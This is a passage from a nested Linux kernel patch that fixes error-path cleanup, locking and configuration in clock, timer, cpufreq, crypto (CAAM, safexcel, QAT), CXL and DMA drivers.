+ 	desc = &lpass_cc_top_sc7280_desc;
+ 
+ 	ret = qcom_cc_probe_by_index(pdev, 1, desc);
+diff --git a/drivers/clk/rockchip/clk-rk3399.c b/drivers/clk/rockchip/clk-rk3399.c
+index 306910a3a0d38..9ebd6c451b3db 100644
+--- a/drivers/clk/rockchip/clk-rk3399.c
++++ b/drivers/clk/rockchip/clk-rk3399.c
+@@ -1263,7 +1263,7 @@ static struct rockchip_clk_branch rk3399_clk_branches[] __initdata = {
+ 			RK3399_CLKSEL_CON(56), 6, 2, MFLAGS,
+ 			RK3399_CLKGATE_CON(10), 7, GFLAGS),
+ 
+-	COMPOSITE_NOGATE(SCLK_CIF_OUT, "clk_cifout", mux_clk_cif_p, 0,
++	COMPOSITE_NOGATE(SCLK_CIF_OUT, "clk_cifout", mux_clk_cif_p, CLK_SET_RATE_PARENT,
+ 			 RK3399_CLKSEL_CON(56), 5, 1, MFLAGS, 0, 5, DFLAGS),
+ 
+ 	/* gic */
+diff --git a/drivers/clocksource/timer-davinci.c b/drivers/clocksource/timer-davinci.c
+index 9996c05425200..b1c248498be46 100644
+--- a/drivers/clocksource/timer-davinci.c
++++ b/drivers/clocksource/timer-davinci.c
+@@ -257,21 +257,25 @@ int __init davinci_timer_register(struct clk *clk,
+ 				resource_size(&timer_cfg->reg),
+ 				"davinci-timer")) {
+ 		pr_err("Unable to request memory region\n");
+-		return -EBUSY;
++		rv = -EBUSY;
++		goto exit_clk_disable;
+ 	}
+ 
+ 	base = ioremap(timer_cfg->reg.start, resource_size(&timer_cfg->reg));
+ 	if (!base) {
+ 		pr_err("Unable to map the register range\n");
+-		return -ENOMEM;
++		rv = -ENOMEM;
++		goto exit_mem_region;
+ 	}
+ 
+ 	davinci_timer_init(base);
+ 	tick_rate = clk_get_rate(clk);
+ 
+ 	clockevent = kzalloc(sizeof(*clockevent), GFP_KERNEL);
+-	if (!clockevent)
+-		return -ENOMEM;
++	if (!clockevent) {
++		rv = -ENOMEM;
++		goto exit_iounmap_base;
++	}
+ 
+ 	clockevent->dev.name = "tim12";
+ 	clockevent->dev.features = CLOCK_EVT_FEAT_ONESHOT;
+@@ -296,7 +300,7 @@ int __init davinci_timer_register(struct clk *clk,
+ 			 "clockevent/tim12", clockevent);
+ 	if (rv) {
+ 		pr_err("Unable to request the clockevent interrupt\n");
+-		return rv;
++		goto exit_free_clockevent;
+ 	}
+ 
+ 	davinci_clocksource.dev.rating = 300;
+@@ -323,13 +327,27 @@ int __init davinci_timer_register(struct clk *clk,
+ 	rv = clocksource_register_hz(&davinci_clocksource.dev, tick_rate);
+ 	if (rv) {
+ 		pr_err("Unable to register clocksource\n");
+-		return rv;
++		goto exit_free_irq;
+ 	}
+ 
+ 	sched_clock_register(davinci_timer_read_sched_clock,
+ 			     DAVINCI_TIMER_CLKSRC_BITS, tick_rate);
+ 
+ 	return 0;
++
++exit_free_irq:
++	free_irq(timer_cfg->irq[DAVINCI_TIMER_CLOCKEVENT_IRQ].start,
++			clockevent);
++exit_free_clockevent:
++	kfree(clockevent);
++exit_iounmap_base:
++	iounmap(base);
++exit_mem_region:
++	release_mem_region(timer_cfg->reg.start,
++			   resource_size(&timer_cfg->reg));
++exit_clk_disable:
++	clk_disable_unprepare(clk);
++	return rv;
+ }
+ 
+ static int __init of_davinci_timer_register(struct device_node *np)
+diff --git a/drivers/cpufreq/cpufreq.c b/drivers/cpufreq/cpufreq.c
+index 7e56a42750ea5..285ba51b31f60 100644
+--- a/drivers/cpufreq/cpufreq.c
++++ b/drivers/cpufreq/cpufreq.c
+@@ -1727,7 +1727,7 @@ static unsigned int cpufreq_verify_current_freq(struct cpufreq_policy *policy, b
+ 		 * MHz. In such cases it is better to avoid getting into
+ 		 * unnecessary frequency updates.
+ 		 */
+-		if (abs(policy->cur - new_freq) < HZ_PER_MHZ)
++		if (abs(policy->cur - new_freq) < KHZ_PER_MHZ)
+ 			return policy->cur;
+ 
+ 		cpufreq_out_of_sync(policy, new_freq);
+diff --git a/drivers/cpufreq/mediatek-cpufreq.c b/drivers/cpufreq/mediatek-cpufreq.c
+index 7f2680bc9a0f4..9a39a7ccfae96 100644
+--- a/drivers/cpufreq/mediatek-cpufreq.c
++++ b/drivers/cpufreq/mediatek-cpufreq.c
+@@ -373,13 +373,13 @@ static struct device *of_get_cci(struct device *cpu_dev)
+ 	struct platform_device *pdev;
+ 
+ 	np = of_parse_phandle(cpu_dev->of_node, "mediatek,cci", 0);
+-	if (IS_ERR_OR_NULL(np))
+-		return NULL;
++	if (!np)
++		return ERR_PTR(-ENODEV);
+ 
+ 	pdev = of_find_device_by_node(np);
+ 	of_node_put(np);
+-	if (IS_ERR_OR_NULL(pdev))
+-		return NULL;
++	if (!pdev)
++		return ERR_PTR(-ENODEV);
+ 
+ 	return &pdev->dev;
+ }
+@@ -401,7 +401,7 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 	info->ccifreq_bound = false;
+ 	if (info->soc_data->ccifreq_supported) {
+ 		info->cci_dev = of_get_cci(info->cpu_dev);
+-		if (IS_ERR_OR_NULL(info->cci_dev)) {
++		if (IS_ERR(info->cci_dev)) {
+ 			ret = PTR_ERR(info->cci_dev);
+ 			dev_err(cpu_dev, "cpu%d: failed to get cci device\n", cpu);
+ 			return -ENODEV;
+@@ -420,7 +420,7 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 		ret = PTR_ERR(info->inter_clk);
+ 		dev_err_probe(cpu_dev, ret,
+ 			      "cpu%d: failed to get intermediate clk\n", cpu);
+-		goto out_free_resources;
++		goto out_free_mux_clock;
+ 	}
+ 
+ 	info->proc_reg = regulator_get_optional(cpu_dev, "proc");
+@@ -428,13 +428,13 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 		ret = PTR_ERR(info->proc_reg);
+ 		dev_err_probe(cpu_dev, ret,
+ 			      "cpu%d: failed to get proc regulator\n", cpu);
+-		goto out_free_resources;
++		goto out_free_inter_clock;
+ 	}
+ 
+ 	ret = regulator_enable(info->proc_reg);
+ 	if (ret) {
+ 		dev_warn(cpu_dev, "cpu%d: failed to enable vproc\n", cpu);
+-		goto out_free_resources;
++		goto out_free_proc_reg;
+ 	}
+ 
+ 	/* Both presence and absence of sram regulator are valid cases. */
+@@ -442,14 +442,14 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 	if (IS_ERR(info->sram_reg)) {
+ 		ret = PTR_ERR(info->sram_reg);
+ 		if (ret == -EPROBE_DEFER)
+-			goto out_free_resources;
++			goto out_disable_proc_reg;
+ 
+ 		info->sram_reg = NULL;
+ 	} else {
+ 		ret = regulator_enable(info->sram_reg);
+ 		if (ret) {
+ 			dev_warn(cpu_dev, "cpu%d: failed to enable vsram\n", cpu);
+-			goto out_free_resources;
++			goto out_free_sram_reg;
+ 		}
+ 	}
+ 
+@@ -458,13 +458,13 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 	if (ret) {
+ 		dev_err(cpu_dev,
+ 			"cpu%d: failed to get OPP-sharing information\n", cpu);
+-		goto out_free_resources;
++		goto out_disable_sram_reg;
+ 	}
+ 
+ 	ret = dev_pm_opp_of_cpumask_add_table(&info->cpus);
+ 	if (ret) {
+ 		dev_warn(cpu_dev, "cpu%d: no OPP table\n", cpu);
+-		goto out_free_resources;
++		goto out_disable_sram_reg;
+ 	}
+ 
+ 	ret = clk_prepare_enable(info->cpu_clk);
+@@ -533,43 +533,41 @@ out_disable_mux_clock:
+ out_free_opp_table:
+ 	dev_pm_opp_of_cpumask_remove_table(&info->cpus);
+ 
+-out_free_resources:
+-	if (regulator_is_enabled(info->proc_reg))
+-		regulator_disable(info->proc_reg);
+-	if (info->sram_reg && regulator_is_enabled(info->sram_reg))
++out_disable_sram_reg:
++	if (info->sram_reg)
+ 		regulator_disable(info->sram_reg);
+ 
+-	if (!IS_ERR(info->proc_reg))
+-		regulator_put(info->proc_reg);
+-	if (!IS_ERR(info->sram_reg))
++out_free_sram_reg:
++	if (info->sram_reg)
+ 		regulator_put(info->sram_reg);
+-	if (!IS_ERR(info->cpu_clk))
+-		clk_put(info->cpu_clk);
+-	if (!IS_ERR(info->inter_clk))
+-		clk_put(info->inter_clk);
++
++out_disable_proc_reg:
++	regulator_disable(info->proc_reg);
++
++out_free_proc_reg:
++	regulator_put(info->proc_reg);
++
++out_free_inter_clock:
++	clk_put(info->inter_clk);
++
++out_free_mux_clock:
++	clk_put(info->cpu_clk);
+ 
+ 	return ret;
+ }
+ 
+ static void mtk_cpu_dvfs_info_release(struct mtk_cpu_dvfs_info *info)
+ {
+-	if (!IS_ERR(info->proc_reg)) {
+-		regulator_disable(info->proc_reg);
+-		regulator_put(info->proc_reg);
+-	}
+-	if (!IS_ERR(info->sram_reg)) {
++	regulator_disable(info->proc_reg);
++	regulator_put(info->proc_reg);
++	if (info->sram_reg) {
+ 		regulator_disable(info->sram_reg);
+ 		regulator_put(info->sram_reg);
+ 	}
+-	if (!IS_ERR(info->cpu_clk)) {
+-		clk_disable_unprepare(info->cpu_clk);
+-		clk_put(info->cpu_clk);
+-	}
+-	if (!IS_ERR(info->inter_clk)) {
+-		clk_disable_unprepare(info->inter_clk);
+-		clk_put(info->inter_clk);
+-	}
+-
++	clk_disable_unprepare(info->cpu_clk);
++	clk_put(info->cpu_clk);
++	clk_disable_unprepare(info->inter_clk);
++	clk_put(info->inter_clk);
+ 	dev_pm_opp_of_cpumask_remove_table(&info->cpus);
+ 	dev_pm_opp_unregister_notifier(info->cpu_dev, &info->opp_nb);
+ }
+@@ -695,6 +693,15 @@ static const struct mtk_cpufreq_platform_data mt2701_platform_data = {
+ 	.ccifreq_supported = false,
+ };
+ 
++static const struct mtk_cpufreq_platform_data mt7622_platform_data = {
++	.min_volt_shift = 100000,
++	.max_volt_shift = 200000,
++	.proc_max_volt = 1360000,
++	.sram_min_volt = 0,
++	.sram_max_volt = 1360000,
++	.ccifreq_supported = false,
++};
++
+ static const struct mtk_cpufreq_platform_data mt8183_platform_data = {
+ 	.min_volt_shift = 100000,
+ 	.max_volt_shift = 200000,
+@@ -713,20 +720,29 @@ static const struct mtk_cpufreq_platform_data mt8186_platform_data = {
+ 	.ccifreq_supported = true,
+ };
+ 
++static const struct mtk_cpufreq_platform_data mt8516_platform_data = {
++	.min_volt_shift = 100000,
++	.max_volt_shift = 200000,
++	.proc_max_volt = 1310000,
++	.sram_min_volt = 0,
++	.sram_max_volt = 1310000,
++	.ccifreq_supported = false,
++};
++
+ /* List of machines supported by this driver */
+ static const struct of_device_id mtk_cpufreq_machines[] __initconst = {
+ 	{ .compatible = "mediatek,mt2701", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt2712", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt7622", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt7623", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt8167", .data = &mt2701_platform_data },
++	{ .compatible = "mediatek,mt7622", .data = &mt7622_platform_data },
++	{ .compatible = "mediatek,mt7623", .data = &mt7622_platform_data },
++	{ .compatible = "mediatek,mt8167", .data = &mt8516_platform_data },
+ 	{ .compatible = "mediatek,mt817x", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt8173", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt8176", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt8183", .data = &mt8183_platform_data },
+ 	{ .compatible = "mediatek,mt8186", .data = &mt8186_platform_data },
+ 	{ .compatible = "mediatek,mt8365", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt8516", .data = &mt2701_platform_data },
++	{ .compatible = "mediatek,mt8516", .data = &mt8516_platform_data },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(of, mtk_cpufreq_machines);
+diff --git a/drivers/cpufreq/qcom-cpufreq-hw.c b/drivers/cpufreq/qcom-cpufreq-hw.c
+index d10bf7635a0d5..749b60c78da5d 100644
+--- a/drivers/cpufreq/qcom-cpufreq-hw.c
++++ b/drivers/cpufreq/qcom-cpufreq-hw.c
+@@ -13,7 +13,6 @@
+ #include <linux/of_address.h>
+ #include <linux/of_platform.h>
+ #include <linux/pm_opp.h>
+-#include <linux/pm_qos.h>
+ #include <linux/slab.h>
+ #include <linux/spinlock.h>
+ #include <linux/units.h>
+@@ -57,8 +56,6 @@ struct qcom_cpufreq_data {
+ 	struct cpufreq_policy *policy;
+ 
+ 	bool per_core_dcvs;
+-
+-	struct freq_qos_request throttle_freq_req;
+ };
+ 
+ static unsigned long cpu_hw_rate, xo_rate;
+@@ -343,8 +340,6 @@ static void qcom_lmh_dcvs_notify(struct qcom_cpufreq_data *data)
+ 
+ 	throttled_freq = freq_hz / HZ_PER_KHZ;
+ 
+-	freq_qos_update_request(&data->throttle_freq_req, throttled_freq);
+-
+ 	/* Update thermal pressure (the boost frequencies are accepted) */
+ 	arch_update_thermal_pressure(policy->related_cpus, throttled_freq);
+ 
+@@ -437,14 +432,6 @@ static int qcom_cpufreq_hw_lmh_init(struct cpufreq_policy *policy, int index)
+ 	if (data->throttle_irq < 0)
+ 		return data->throttle_irq;
+ 
+-	ret = freq_qos_add_request(&policy->constraints,
+-				   &data->throttle_freq_req, FREQ_QOS_MAX,
+-				   FREQ_QOS_MAX_DEFAULT_VALUE);
+-	if (ret < 0) {
+-		dev_err(&pdev->dev, "Failed to add freq constraint (%d)\n", ret);
+-		return ret;
+-	}
+-
+ 	data->cancel_throttle = false;
+ 	data->policy = policy;
+ 
+@@ -511,7 +498,6 @@ static void qcom_cpufreq_hw_lmh_exit(struct qcom_cpufreq_data *data)
+ 	if (data->throttle_irq <= 0)
+ 		return;
+ 
+-	freq_qos_remove_request(&data->throttle_freq_req);
+ 	free_irq(data->throttle_irq, data);
+ }
+ 
+diff --git a/drivers/cpuidle/cpuidle-riscv-sbi.c b/drivers/cpuidle/cpuidle-riscv-sbi.c
+index 05fe2902df9a7..af7320a768d27 100644
+--- a/drivers/cpuidle/cpuidle-riscv-sbi.c
++++ b/drivers/cpuidle/cpuidle-riscv-sbi.c
+@@ -612,7 +612,7 @@ static int __init sbi_cpuidle_init(void)
+ 	 * 2) SBI HSM extension is available
+ 	 */
+ 	if ((sbi_spec_version < sbi_mk_version(0, 3)) ||
+-	    sbi_probe_extension(SBI_EXT_HSM) <= 0) {
++	    !sbi_probe_extension(SBI_EXT_HSM)) {
+ 		pr_info("HSM suspend not available\n");
+ 		return 0;
+ 	}
+diff --git a/drivers/crypto/Kconfig b/drivers/crypto/Kconfig
+index 4a618d80e106f..db242234c1cfa 100644
+--- a/drivers/crypto/Kconfig
++++ b/drivers/crypto/Kconfig
+@@ -810,6 +810,7 @@ config CRYPTO_DEV_SA2UL
+ 	select CRYPTO_AES
+ 	select CRYPTO_ALGAPI
+ 	select CRYPTO_AUTHENC
++	select CRYPTO_DES
+ 	select CRYPTO_SHA1
+ 	select CRYPTO_SHA256
+ 	select CRYPTO_SHA512
+diff --git a/drivers/crypto/caam/ctrl.c b/drivers/crypto/caam/ctrl.c
+index 32253a064d0fe..3b79e0d83d40a 100644
+--- a/drivers/crypto/caam/ctrl.c
++++ b/drivers/crypto/caam/ctrl.c
+@@ -284,6 +284,10 @@ static int instantiate_rng(struct device *ctrldev, int state_handle_mask,
+ 		const u32 rdsta_if = RDSTA_IF0 << sh_idx;
+ 		const u32 rdsta_pr = RDSTA_PR0 << sh_idx;
+ 		const u32 rdsta_mask = rdsta_if | rdsta_pr;
++
++		/* Clear the contents before using the descriptor */
++		memset(desc, 0x00, CAAM_CMD_SZ * 7);
++
+ 		/*
+ 		 * If the corresponding bit is set, this state handle
+ 		 * was initialized by somebody else, so it's left alone.
+@@ -327,8 +331,6 @@ static int instantiate_rng(struct device *ctrldev, int state_handle_mask,
+ 		}
+ 
+ 		dev_info(ctrldev, "Instantiated RNG4 SH%d\n", sh_idx);
+-		/* Clear the contents before recreating the descriptor */
+-		memset(desc, 0x00, CAAM_CMD_SZ * 7);
+ 	}
+ 
+ 	kfree(desc);
+diff --git a/drivers/crypto/ccp/sp-pci.c b/drivers/crypto/ccp/sp-pci.c
+index 084d052fddccb..55411b494d69a 100644
+--- a/drivers/crypto/ccp/sp-pci.c
++++ b/drivers/crypto/ccp/sp-pci.c
+@@ -451,9 +451,9 @@ static const struct pci_device_id sp_pci_table[] = {
+ 	{ PCI_VDEVICE(AMD, 0x1468), (kernel_ulong_t)&dev_vdata[2] },
+ 	{ PCI_VDEVICE(AMD, 0x1486), (kernel_ulong_t)&dev_vdata[3] },
+ 	{ PCI_VDEVICE(AMD, 0x15DF), (kernel_ulong_t)&dev_vdata[4] },
+-	{ PCI_VDEVICE(AMD, 0x1649), (kernel_ulong_t)&dev_vdata[4] },
+ 	{ PCI_VDEVICE(AMD, 0x14CA), (kernel_ulong_t)&dev_vdata[5] },
+ 	{ PCI_VDEVICE(AMD, 0x15C7), (kernel_ulong_t)&dev_vdata[6] },
++	{ PCI_VDEVICE(AMD, 0x1649), (kernel_ulong_t)&dev_vdata[6] },
+ 	/* Last entry must be zero */
+ 	{ 0, }
+ };
+diff --git a/drivers/crypto/inside-secure/safexcel.c b/drivers/crypto/inside-secure/safexcel.c
+index ad0d8c4a71ac1..ba4613a8e84f7 100644
+--- a/drivers/crypto/inside-secure/safexcel.c
++++ b/drivers/crypto/inside-secure/safexcel.c
+@@ -1631,19 +1631,23 @@ static int safexcel_probe_generic(void *pdev,
+ 						     &priv->ring[i].rdr);
+ 		if (ret) {
+ 			dev_err(dev, "Failed to initialize rings\n");
+-			return ret;
++			goto err_cleanup_rings;
+ 		}
+ 
+ 		priv->ring[i].rdr_req = devm_kcalloc(dev,
+ 			EIP197_DEFAULT_RING_SIZE,
+ 			sizeof(*priv->ring[i].rdr_req),
+ 			GFP_KERNEL);
+-		if (!priv->ring[i].rdr_req)
+-			return -ENOMEM;
++		if (!priv->ring[i].rdr_req) {
++			ret = -ENOMEM;
++			goto err_cleanup_rings;
++		}
+ 
+ 		ring_irq = devm_kzalloc(dev, sizeof(*ring_irq), GFP_KERNEL);
+-		if (!ring_irq)
+-			return -ENOMEM;
++		if (!ring_irq) {
++			ret = -ENOMEM;
++			goto err_cleanup_rings;
++		}
+ 
+ 		ring_irq->priv = priv;
+ 		ring_irq->ring = i;
+@@ -1657,7 +1661,8 @@ static int safexcel_probe_generic(void *pdev,
+ 						ring_irq);
+ 		if (irq < 0) {
+ 			dev_err(dev, "Failed to get IRQ ID for ring %d\n", i);
+-			return irq;
++			ret = irq;
++			goto err_cleanup_rings;
+ 		}
+ 
+ 		priv->ring[i].irq = irq;
+@@ -1669,8 +1674,10 @@ static int safexcel_probe_generic(void *pdev,
+ 		snprintf(wq_name, 9, "wq_ring%d", i);
+ 		priv->ring[i].workqueue =
+ 			create_singlethread_workqueue(wq_name);
+-		if (!priv->ring[i].workqueue)
+-			return -ENOMEM;
++		if (!priv->ring[i].workqueue) {
++			ret = -ENOMEM;
++			goto err_cleanup_rings;
++		}
+ 
+ 		priv->ring[i].requests = 0;
+ 		priv->ring[i].busy = false;
+@@ -1687,16 +1694,26 @@ static int safexcel_probe_generic(void *pdev,
+ 	ret = safexcel_hw_init(priv);
+ 	if (ret) {
+ 		dev_err(dev, "HW init failed (%d)\n", ret);
+-		return ret;
++		goto err_cleanup_rings;
+ 	}
+ 
+ 	ret = safexcel_register_algorithms(priv);
+ 	if (ret) {
+ 		dev_err(dev, "Failed to register algorithms (%d)\n", ret);
+-		return ret;
++		goto err_cleanup_rings;
+ 	}
+ 
+ 	return 0;
++
++err_cleanup_rings:
++	for (i = 0; i < priv->config.rings; i++) {
++		if (priv->ring[i].irq)
++			irq_set_affinity_hint(priv->ring[i].irq, NULL);
++		if (priv->ring[i].workqueue)
++			destroy_workqueue(priv->ring[i].workqueue);
++	}
++
++	return ret;
+ }
+ 
+ static void safexcel_hw_reset_rings(struct safexcel_crypto_priv *priv)
+diff --git a/drivers/crypto/qat/qat_common/adf_accel_devices.h b/drivers/crypto/qat/qat_common/adf_accel_devices.h
+index 0a55a4f34dcfd..20f50d0e65f89 100644
+--- a/drivers/crypto/qat/qat_common/adf_accel_devices.h
++++ b/drivers/crypto/qat/qat_common/adf_accel_devices.h
+@@ -296,6 +296,7 @@ struct adf_accel_dev {
+ 			u8 pf_compat_ver;
+ 		} vf;
+ 	};
++	struct mutex state_lock; /* protect state of the device */
+ 	bool is_vf;
+ 	u32 accel_id;
+ };
+diff --git a/drivers/crypto/qat/qat_common/adf_common_drv.h b/drivers/crypto/qat/qat_common/adf_common_drv.h
+index 7bb477c3ce25f..bff613eec5c4b 100644
+--- a/drivers/crypto/qat/qat_common/adf_common_drv.h
++++ b/drivers/crypto/qat/qat_common/adf_common_drv.h
+@@ -58,6 +58,9 @@ void adf_dev_stop(struct adf_accel_dev *accel_dev);
+ void adf_dev_shutdown(struct adf_accel_dev *accel_dev);
+ int adf_dev_shutdown_cache_cfg(struct adf_accel_dev *accel_dev);
+ 
++int adf_dev_up(struct adf_accel_dev *accel_dev, bool init_config);
++int adf_dev_down(struct adf_accel_dev *accel_dev, bool cache_config);
++
+ void adf_devmgr_update_class_index(struct adf_hw_device_data *hw_data);
+ void adf_clean_vf_map(bool);
+ 
+diff --git a/drivers/crypto/qat/qat_common/adf_dev_mgr.c b/drivers/crypto/qat/qat_common/adf_dev_mgr.c
+index 4c752eed10fea..86ee36feefad3 100644
+--- a/drivers/crypto/qat/qat_common/adf_dev_mgr.c
++++ b/drivers/crypto/qat/qat_common/adf_dev_mgr.c
+@@ -223,6 +223,7 @@ int adf_devmgr_add_dev(struct adf_accel_dev *accel_dev,
+ 		map->attached = true;
+ 		list_add_tail(&map->list, &vfs_table);
+ 	}
++	mutex_init(&accel_dev->state_lock);
+ unlock:
+ 	mutex_unlock(&table_lock);
+ 	return ret;
+@@ -269,6 +270,7 @@ void adf_devmgr_rm_dev(struct adf_accel_dev *accel_dev,
+ 		}
+ 	}
+ unlock:
++	mutex_destroy(&accel_dev->state_lock);
+ 	list_del(&accel_dev->list);
+ 	mutex_unlock(&table_lock);
+ }
+diff --git a/drivers/crypto/qat/qat_common/adf_init.c b/drivers/crypto/qat/qat_common/adf_init.c
+index 33a9a46d69494..d6f3314246179 100644
+--- a/drivers/crypto/qat/qat_common/adf_init.c
++++ b/drivers/crypto/qat/qat_common/adf_init.c
+@@ -389,3 +389,67 @@ int adf_dev_shutdown_cache_cfg(struct adf_accel_dev *accel_dev)
+ 
+ 	return 0;
+ }
++
++int adf_dev_down(struct adf_accel_dev *accel_dev, bool reconfig)
++{
++	int ret = 0;
++
++	if (!accel_dev)
++		return -EINVAL;
++
++	mutex_lock(&accel_dev->state_lock);
++
++	if (!adf_dev_started(accel_dev)) {
++		dev_info(&GET_DEV(accel_dev), "Device qat_dev%d already down\n",
++			 accel_dev->accel_id);
++		ret = -EINVAL;
++		goto out;
++	}
++
++	if (reconfig) {
++		ret = adf_dev_shutdown_cache_cfg(accel_dev);
++		goto out;
++	}
++
++	adf_dev_stop(accel_dev);
++	adf_dev_shutdown(accel_dev);
++
++out:
++	mutex_unlock(&accel_dev->state_lock);
++	return ret;
++}
++EXPORT_SYMBOL_GPL(adf_dev_down);
++
++int adf_dev_up(struct adf_accel_dev *accel_dev, bool config)
++{
++	int ret = 0;
++
++	if (!accel_dev)
++		return -EINVAL;
++
++	mutex_lock(&accel_dev->state_lock);
++
++	if (adf_dev_started(accel_dev)) {
++		dev_info(&GET_DEV(accel_dev), "Device qat_dev%d already up\n",
++			 accel_dev->accel_id);
++		ret = -EALREADY;
++		goto out;
++	}
++
++	if (config && GET_HW_DATA(accel_dev)->dev_config) {
++		ret = GET_HW_DATA(accel_dev)->dev_config(accel_dev);
++		if (unlikely(ret))
++			goto out;
++	}
++
++	ret = adf_dev_init(accel_dev);
++	if (unlikely(ret))
++		goto out;
++
++	ret = adf_dev_start(accel_dev);
++
++out:
++	mutex_unlock(&accel_dev->state_lock);
++	return ret;
++}
++EXPORT_SYMBOL_GPL(adf_dev_up);
+diff --git a/drivers/crypto/qat/qat_common/adf_sysfs.c b/drivers/crypto/qat/qat_common/adf_sysfs.c
+index e8b078e719c20..3eb6611ab1b11 100644
+--- a/drivers/crypto/qat/qat_common/adf_sysfs.c
++++ b/drivers/crypto/qat/qat_common/adf_sysfs.c
+@@ -50,38 +50,21 @@ static ssize_t state_store(struct device *dev, struct device_attribute *attr,
+ 
+ 	switch (ret) {
+ 	case DEV_DOWN:
+-		if (!adf_dev_started(accel_dev)) {
+-			dev_info(dev, "Device qat_dev%d already down\n",
+-				 accel_id);
+-			return -EINVAL;
+-		}
+-
+ 		dev_info(dev, "Stopping device qat_dev%d\n", accel_id);
+ 
+-		ret = adf_dev_shutdown_cache_cfg(accel_dev);
++		ret = adf_dev_down(accel_dev, true);
+ 		if (ret < 0)
+ 			return -EINVAL;
+ 
+ 		break;
+ 	case DEV_UP:
+-		if (adf_dev_started(accel_dev)) {
+-			dev_info(dev, "Device qat_dev%d already up\n",
+-				 accel_id);
+-			return -EINVAL;
+-		}
+-
+ 		dev_info(dev, "Starting device qat_dev%d\n", accel_id);
+ 
+-		ret = GET_HW_DATA(accel_dev)->dev_config(accel_dev);
+-		if (!ret)
+-			ret = adf_dev_init(accel_dev);
+-		if (!ret)
+-			ret = adf_dev_start(accel_dev);
+-
++		ret = adf_dev_up(accel_dev, true);
+ 		if (ret < 0) {
+ 			dev_err(dev, "Failed to start device qat_dev%d\n",
+ 				accel_id);
+-			adf_dev_shutdown_cache_cfg(accel_dev);
++			adf_dev_down(accel_dev, true);
+ 			return ret;
+ 		}
+ 		break;
+diff --git a/drivers/cxl/core/hdm.c b/drivers/cxl/core/hdm.c
+index d1d2caea5c626..5aa0726aafe6f 100644
+--- a/drivers/cxl/core/hdm.c
++++ b/drivers/cxl/core/hdm.c
+@@ -214,8 +214,11 @@ static int __cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
+ 
+ 	lockdep_assert_held_write(&cxl_dpa_rwsem);
+ 
+-	if (!len)
+-		goto success;
++	if (!len) {
++		dev_warn(dev, "decoder%d.%d: empty reservation attempted\n",
++			 port->id, cxled->cxld.id);
++		return -EINVAL;
++	}
+ 
+ 	if (cxled->dpa_res) {
+ 		dev_dbg(dev, "decoder%d.%d: existing allocation %pr assigned\n",
+@@ -268,7 +271,6 @@ static int __cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
+ 		cxled->mode = CXL_DECODER_MIXED;
+ 	}
+ 
+-success:
+ 	port->hdm_end++;
+ 	get_device(&cxled->cxld.dev);
+ 	return 0;
+@@ -727,6 +729,13 @@ static int init_hdm_decoder(struct cxl_port *port, struct cxl_decoder *cxld,
+ 				 port->id, cxld->id);
+ 			return -ENXIO;
+ 		}
++
++		if (size == 0) {
++			dev_warn(&port->dev,
++				 "decoder%d.%d: Committed with zero size\n",
++				 port->id, cxld->id);
++			return -ENXIO;
++		}
+ 		port->commit_end = cxld->id;
+ 	} else {
+ 		/* unless / until type-2 drivers arrive, assume type-3 */
+diff --git a/drivers/dma/at_xdmac.c b/drivers/dma/at_xdmac.c
+index d6c9781cd46af..bfc8ae2143957 100644
+--- a/drivers/dma/at_xdmac.c
++++ b/drivers/dma/at_xdmac.c
+@@ -243,6 +243,7 @@ struct at_xdmac {
+ 	int			irq;
+ 	struct clk		*clk;
+ 	u32			save_gim;
++	u32			save_gs;
+ 	struct dma_pool		*at_xdmac_desc_pool;
+ 	const struct at_xdmac_layout	*layout;
+ 	struct at_xdmac_chan	chan[];
+@@ -1988,6 +1989,7 @@ static int __maybe_unused atmel_xdmac_suspend(struct device *dev)
+ 		}
+ 	}
+ 	atxdmac->save_gim = at_xdmac_read(atxdmac, AT_XDMAC_GIM);
++	atxdmac->save_gs = at_xdmac_read(atxdmac, AT_XDMAC_GS);
+ 
+ 	at_xdmac_off(atxdmac);
+ 	clk_disable_unprepare(atxdmac->clk);
+@@ -2027,7 +2029,8 @@ static int __maybe_unused atmel_xdmac_resume(struct device *dev)
+ 			at_xdmac_chan_write(atchan, AT_XDMAC_CNDC, atchan->save_cndc);
+ 			at_xdmac_chan_write(atchan, AT_XDMAC_CIE, atchan->save_cim);
+ 			wmb();
+-			at_xdmac_write(atxdmac, AT_XDMAC_GE, atchan->mask);
++			if (atxdmac->save_gs & atchan->mask)
++				at_xdmac_write(atxdmac, AT_XDMAC_GE, atchan->mask);
+ 		}
+ 	}
+ 	return 0;
+diff --git a/drivers/dma/dw-edma/dw-edma-core.c b/drivers/dma/dw-edma/dw-edma-core.c
+index 52bdf04aff511..ef4cdcf6beba0 100644
+--- a/drivers/dma/dw-edma/dw-edma-core.c
++++ b/drivers/dma/dw-edma/dw-edma-core.c
+@@ -170,7 +170,7 @@ static void vchan_free_desc(struct virt_dma_desc *vdesc)
+ 	dw_edma_free_desc(vd2dw_edma_desc(vdesc));
+ }
+ 
+-static void dw_edma_start_transfer(struct dw_edma_chan *chan)
++static int dw_edma_start_transfer(struct dw_edma_chan *chan)
+ {
+ 	struct dw_edma_chunk *child;
+ 	struct dw_edma_desc *desc;
+@@ -178,16 +178,16 @@ static void dw_edma_start_transfer(struct dw_edma_chan *chan)
+ 
+ 	vd = vchan_next_desc(&chan->vc);
+ 	if (!vd)
+-		return;
++		return 0;
+ 
+ 	desc = vd2dw_edma_desc(vd);
+ 	if (!desc)
+-		return;
++		return 0;
+ 
+ 	child = list_first_entry_or_null(&desc->chunk->list,
+ 					 struct dw_edma_chunk, list);
